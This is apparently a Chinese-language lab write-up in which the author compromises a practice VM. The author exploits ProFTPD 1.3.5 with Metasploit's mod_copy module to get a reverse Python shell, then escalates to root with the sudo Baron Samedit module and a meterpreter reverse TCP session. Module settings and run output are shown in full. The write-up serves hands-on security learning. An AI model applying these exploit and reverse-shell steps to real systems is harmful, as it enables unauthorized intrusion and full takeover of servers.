# 靶场搭建
直接下载后导入,使用 NAT 模式
IP: 192.168.1.130
# 信息初收集
21/tcp open ftp | |
80/tcp open http |
ftp 空口令登录什么的都没有,80 端口敏感目录收集没有信息。
就两个端口,那就要进一步做指纹识别
21/tcp open ftp ProFTPD 1.3.5rc3
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
FTP 的版本查了一下是有漏洞的,而且 msf 上就有利用模块。
# 渗透过程
# proftpd_modcopy_exec
metasploit 直接 gank
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > show options
Module options (exploit/unix/ftp/proftpd_modcopy_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.130 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
cs/using-metasploit.html
RPORT 80 yes HTTP port (TCP)
RPORT_FTP 21 yes FTP port
SITEPATH /var/www/html yes Absolute writable website path
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path to the website
TMPPATH /tmp yes Absolute writable path
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_python):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.129 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SHELL /bin/sh yes The system shell to use
Exploit target:
Id Name
-- ----
0 ProFTPD 1.3.5
View the full module info with the info, or info -d command.
run 一下拿到 shell
# 提权
搜索一下提权的模块: msf6 exploit(unix/ftp/proftpd_modcopy_exec) > search priv platform:linux ubuntu
使用 62 号
msf6 exploit(linux/local/sudo_baron_samedit) > show options
Module options (exploit/linux/local/sudo_baron_samedit):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
WritableDir /tmp yes A directory where you can write files.
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.129 yes The listen address (an interface may be specified)
LPORT 2255 yes The listen port
Exploit target:
Id Name
-- ----
7 Ubuntu 14.04 x64 (sudo v1.8.9p5, libc v2.19)
View the full module info with the info, or info -d command.
msf6 exploit(linux/local/sudo_baron_samedit) > run
[*] Started reverse TCP handler on 192.168.1.129:2255
[!] SESSION may not be compatible with this module:
[!] * incompatible session architecture: cmd
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. sudo 1.8.9.5 is a vulnerable build.
[*] Writing '/tmp/KZd7d.py' (2797 bytes) ...
[*] Writing '/tmp/libnss_tY8/0zE.so.2' (548 bytes) ...
[*] Sending stage (3045380 bytes) to 192.168.1.130
[+] Deleted /tmp/KZd7d.py
[+] Deleted /tmp/libnss_tY8/0zE.so.2
[+] Deleted /tmp/libnss_tY8
[*] Meterpreter session 2 opened (192.168.1.129:2255 -> 192.168.1.130:42417) at 2024-04-30 00:17:02 -0400
meterpreter > getuid
Server username: root
meterpreter >
直接拿到了 root 权限
# 小结
metasploit 赛高!
需要总结下 Linux 环境下的提权方式。
